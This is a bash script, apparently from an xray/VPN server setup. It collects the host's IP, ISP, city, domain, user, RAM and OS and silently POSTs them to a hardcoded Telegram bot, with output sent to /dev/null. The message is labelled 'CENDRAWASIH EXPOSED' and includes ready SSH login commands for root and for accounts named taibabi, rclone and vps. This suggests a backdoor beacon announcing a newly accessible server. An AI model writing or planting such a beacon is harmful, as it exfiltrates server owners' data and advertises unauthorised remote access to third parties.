#!/bin/bash
TIME=$(date +'%Y-%m-%d %H:%M:%S')
MYIP=$(wget -qO- ipinfo.io/ip)
ISP=$(wget -qO- ipinfo.io/org)
domain=$(cat /etc/xray/domain)
CITY=$(curl -s ipinfo.io/city)
NAMES=$(whoami)
RAMMS=$(free -m | awk 'NR==2 {print $2}')
NAMECOM=$(wget -qO- ipinfo.io/ip)
OS=$(cat /etc/os-release | grep -w PRETTY_NAME | head -n1 | sed 's/=//g' | sed 's/"//g' | sed 's/PRETTY_NAME//g')

message="
<u>CENDRAWASIH EXPOSED</u> <b>ONLINE!!!</b>
<code>TIME    : </code><code>${TIME}</code>
<code>DOMAIN  : </code><code>${domain}</code>
<code>IP VPS  : </code><code>${MYIP}</code>
<code>ISP  : </code><code>${ISP}</code>
<code>LOKASI  : </code><code>${CITY}</code>
<code>USER    : </code><code>${NAMES}</code>
<code>RAM     : </code><code>${RAMMS}MB</code>
<code>LINUX   : </code><code>${OS}</code>
<code>SSH-1   : </code><code>ssh root@${MYIP} -qvi taibabi</code>
<code>SSH-2   : </code><code>ssh taibabi@${MYIP} -qv</code>
<code>SSH-3   : </code><code>ssh rclone@${MYIP} -qv</code>
<code>SSH-4   : </code><code>ssh vps@${MYIP} -qv</code>
"

curl -s -X POST "https://api.telegram.org/bot2145515560:AAE9WqfxZzQC-FYF1VUprICGNomVfv6OdTU/sendmessage" \
-d "chat_id=1036440597" -d "parse_mode=html" -d "text=$message" >/dev/null 2>&1